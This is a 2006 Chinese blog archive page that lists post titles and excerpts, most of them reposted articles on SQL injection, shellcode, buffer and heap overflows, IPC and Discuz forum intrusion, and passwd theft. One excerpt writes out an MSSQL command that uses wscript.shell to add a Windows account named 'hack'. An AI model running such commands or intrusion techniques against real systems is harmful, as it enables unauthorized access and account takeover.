自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

修养生息,以得佳境

平淡无常乃大智

  • 博客(26)
  • 收藏
  • 关注

转载 汇编指令集

一、数据传输指令 ─────────────────────────────────────── 它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据. 1. 通用数据传送指令. MOV 传送字或字节. MOVSX 先符号扩展,再传送. MOVZX 先零扩展,再传送. PUSH 把字压入堆栈. POP 把字弹出堆栈. PUSHA 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.

2006-03-31 22:24:00 1926

原创 acsess sql injection code by c

//4月20日修改,代码可能比较不规范,没加注释!#include #include #include #include #include #include #pragma comment(lib, "wininet.lib")typedef struct{  //字段的结构 char *name;  //字段名 DWORD  len;   //值长度 char *dic;  //字典 c

2006-03-31 22:18:00 866

转载 linux初学者常用命令

1 文件管理 # ls ls -a 列出当前目录下的所有文件,包括以.头的隐含文件 文件管理 # ls ls -l或ll 列出当前目录下文件的详细信息 文件管理 # pwd pwd 查看当前所在目录的绝对路经 文件管理 # cd cd .. 回当前目录的上一级目录 文件管理 # cd cd - 回上一次所在的目录 文件管理 # cd cd ~ 或 cd 回当前用户的宿主目录 文件管理 # cd c

2006-03-31 18:54:00 787

转载 shellcode技术探讨续一

shellcode技术探讨续一发布日期: 2000-1-25 内容:-------------------------------------------------------------------------------- 来源:概述:    本文旨在验证前文几个问题所在,当时我在一旁加了注解,    可能有朋友觉得理解有点问题,看了这篇就没问题了。    还有就是针对以前有人问过的,如何得

2006-03-30 13:08:00 1395

转载 来年 我再做你的主人

 来年 我再做你的主人                                                  转自网络_qzone悄悄的,我来到了这个世界. 调皮的风亲昵的舔着我的眼睛,还在我的耳边不停的 吹气,轻轻的呼唤着:“我的小主人,快点睁开你美丽的眼睛,看看这个美丽的世界。“ 于是我第一次睁开了双眼,哇,原来这个世界是绿色的。风在我的声旁萦绕,他笑着说“我的小主人,

2006-03-17 15:54:00 806

转载 诗句充酒茶

天涯流落思无穷 既相逢 却匆匆 携手佳人 和泪折残红 为问东风余几许 春纵在 与谁同  〤有志者事竟成,破釜沉舟,百二秦关终属楚;苦心人天不负,卧薪尝胆,三千越甲可吞吴。既然选择了远方,便只能风雨兼程。钱:是个可以让人面目全非的东西。久济忘恩,一渴成怨!太多的人这样了。独立的灵魂,有着坚定的自信和顽强的毅力,有着对于真理永恒不息的好奇。纵使穷困潦倒,亦能为了理想而努力;

2006-03-16 10:30:00 1375

转载 discuz 4.0.0 漏洞

discuz 4.0.0 漏洞discuz 4.0.0 漏洞黑客入侵实例 记对Discuz论坛的入侵--大家快来看看啊!最近我无意中看到了这篇文章,本人水平有限,还是请高手们来看看,真是如下文所说吗?最近闲来无事的菜鸟们,掀起了一场Discuz论坛,入侵狂潮的“运动”。一时间闹整个安全界也是沸腾不已。不过各站点的站长们身手还算敏捷,低版本Discuz论坛还没用多久,便换上了高版本的论坛(Discu

2006-03-14 22:06:00 2972 1

转载 爱因斯坦的一生

爱因斯坦年表   1879年 3月14日上午11时30分,爱因斯坦出生在德国乌尔姆市班霍夫街135号。父母都是 犹太人。父名赫尔曼·爱因斯坦,母亲波林·科克。   1880年 爱因斯坦一家迁居慕尼黑。父同其弟雅各布合办一电器设备小工厂。   1881年 11月18日,爱因斯坦的妹妹玛雅出世。1884年 爱因斯坦对袖珍罗盘着迷。进天主 教小学读书。   1885年 爱因斯坦开始学小提琴。   188

2006-03-14 19:15:00 2226

转载 IPC入侵全攻略

IPC入侵全攻略 by analysist http://www.china4lert.org 声明:其实针对IPC漏洞入侵的方法目前已经有很多的教程,但是其中很多教程并不完整,所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题,这就是我写这篇文章的原因了。如果你觉得本文也不完整,那只好去找更好的版本了,但是我希望你能把你的意见和建议告诉我,让我不断的完善这篇文章。本文参考了小榕的流光

2006-03-13 22:13:00 877

转载 有人这样学习┅

自从开放《深入浅出 MFC》2/e 电子档之後,我收到很多相应来函。由於工作忙碌,鲜少针对个人回信,顶多是收集同类型的询问在侯捷网站上做总体回应。但是这封信我一定要回,仔细地回,特加鼓励地回。> -----原始邮件-----寄件者: bluefive > 日期: 2000年8月26日 PM 01:12>> 候老师您好!>> 姓名: bluefive> 现职: 家具雕刻> 毕业学校科系: 没

2006-03-13 22:07:00 606

转载 打印可执行程序二进制码

//打印16进制#include #include int main(int argc,char **argv) {  HANDLE hFile;  DWORD dwSize,dwRead,dwIndex=0,i;  unsigned char *lpBuff=NULL;  __try  {   if(argc!=2)   {    printf(" Usage: %s ",argv[0]);

2006-03-13 22:03:00 682

转载 mssql 加帐号命令

加NT帐号declare @cmd INT exec sp_oacreate wscript.shell,@cmd output exec sp_oamethod @cmd,run,null,net user hack hack /add,0,truedeclare @cmd INTexec sp_oacreate wscript.shell,@cmd outputex

2006-03-13 22:02:00 910

转载 为了娱乐和利益粉碎栈(Smashing The Stack For Fun And Profit)

“粉碎栈”[C编程]。在许多C语言的实现中,通过对一个程序中声明为auto的数组的尾进行越界存取而破坏一个栈的运行是有可能的。实现这种操作的代码被称为粉碎栈代码,能够导致从程序中返回跳到一个任意的地址。这可以制造我们所知道的最阴险的数据依赖错误(bugs)。各种方式包括清空(trash)栈,滥写(scribble)栈,破坏(mangle)栈;mung the stack一词不使用,因为这从来不是故

2006-03-13 21:59:00 1461

转载 用于下载的脚本

CMD下Web & ftp 下载脚本 作者:  出处:  更新时间: 2005年05月25日 

2006-03-13 21:57:00 1306

转载 总结windows下堆溢出的三种利用方式

总结windows下堆溢出的三种利用方式创建时间:2004-04-08文章属性:转载文章提交:watercloud (watercloud_at_xfocus.org)原文由Leven发在网络编程版:https://www.xfocus.net/bbs/index.php?act=SE&f=3&t=34455&p=122380总结windows下堆溢出的三种利用方式1.利用RtlA

2006-03-13 21:55:00 834

转载 window系统下的堆栈溢出

绿盟安全月刊->第7期->技术专题 --> wind

2006-03-13 21:52:00 1446

转载 溢出的原理 (上)

一:基础知识计算机内存运行分配的区域分为3个程序段区域:不允许写的数据段区域:静态全局变量是位于数据段并且在程序开始运行的时候被加载堆栈区域:放置程序的动态的用于计算的局部和临时变量则分配在堆栈里面和在过程调用中压入的返回地址数据。堆栈是一个先入后出的队列。一般计算机系统堆栈的方向与内存的方向相反。压栈的xx作push=ESP-4,出栈的xx作是pop=ESP+4.在一

2006-03-13 21:49:00 2491

原创 利用进程欺骗杀受保护进程

欺骗原理:首先编一个我们将要伪造的程序,使他的名字和我们要杀的进程的名字相同。当我们第一次杀掉那个受保护的进程后马上对它进行改名,然后将伪造的程序复制到要杀的程序所在的目录,这样就达到了欺骗的目的。我猜想,进程保护的原理就是检测系统中是否启动了期望运行的进程,如果没有发现则启动它。如果它被改动或删除,保护进程就象病毒那样自动生成一个它期望运行的进程。因为它是按进程名检测的,那么我们把同样名字的

2006-03-13 21:27:00 2267

转载 永远的Sql Injection + PHP注射

永远的Sql Injection + PHP注射 作者:未知 来源:http://www.x2s.orgSql Injection永远是那么可爱... Sql注射总结(早源于or1=1) 最重要的表名: select * from sysobjects sysobjects ncsysobjects sysindexes tsysindexes syscolumns systype

2006-03-13 21:23:00 1393

转载 可以杀任何进程的代码

#include #include BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege) { TOKEN_PRIVILEGES tp;  LUID luid;  if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))  {   printf(" Loo

2006-03-13 21:16:00 745

转载 书写Linux下自己的shellcode(经典回放)

书写Linux下自己的shellcode发布日期: 2000-1-25 内容:-------------------------------------------------------------------------------- 原    作:aleph1 翻译注释:warning3  1999/07验证修改:scz  2000/01/13概述:    aleph1书写了这篇经典文章,首

2006-03-13 14:01:00 1497

转载 如何获取passwd密码档

如何获取passwd密码档 作者: 更新日期:2005-03-17 类别:网络安全->黑客技术 总浏览/今日:8/7 目录: PHF:WWW的PH查询 PHF查询攻击新方法 从新手处获取 获取shadow密码档 获取/etc/hosts档 本文列举了几种从UNIX系统获取密码档的方法。其中大多数方法要求你拥有一个有效帐号;但也有不需帐号也可访问系统的方法。在这里你还能知道完整的密码档与shad

2006-03-10 22:30:00 1371

转载 Ollydbg手脱UPX加壳的DLL

Ollydbg手脱UPX加壳的DLL 作者:FLY 文章来源:网络 点击数:33 更新时间:2005-2-27   Ollydbg手脱UPX加壳的DLL                          [fly]                               【目标程序】:UPX加壳的EdrLib.dll。附件中还有输入表、重定位数据、UPXAngela以及UnPacked以供参考

2006-03-10 22:27:00 1710

转载 非安全编程演示之格式化字符串篇version1.1

非安全编程演示之格式化字符串篇version1.1创建时间:2003-03-07文章属性:翻译文章来源:http://www.ph4nt0m.net/doc/core_format.htm文章提交:Ph4nt0m (axis_at_ph4nt0m.net)Title:非安全编程演示之格式化字符串篇version1.1翻译+整理:刺(ph4nt0m)来源http://www.ph4nt0

2006-03-09 17:26:00 1009

转载 Windows系统下的File Stream Overflows(FSO)

Windows系统下的File Stream Overflows(FSO)作者: NanikaEmail: minjack.tw@yahoo.com.tw Nanika@seed.net.tw前言:    看过alert7大哥所写的一篇一种新的File Stream Overflows(FSO),跟以往的利用方法都不一样,使我觉得很有兴趣,便开始着手研究有关Windows系统的(FSO),在研

2006-03-09 17:22:00 1000

转载 堆溢出

作者:袁哥 mailto:yuange@nsfocus.com>主页:http://www.nsfocus.com现在堆溢出的研究有点升温,暴露出来的堆溢出漏洞也越来越多,所以就有必要研究有效的堆溢出攻击方法了。由于堆溢出只是溢出的一种形式,原理已经介绍得比较多,也比较简单,所以就不再做这方面的介绍。一、堆溢出后的后果;    现在的系统管理堆,为了查询的高效快速,一般都使用的双向链表

2006-03-09 17:14:00 1245

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除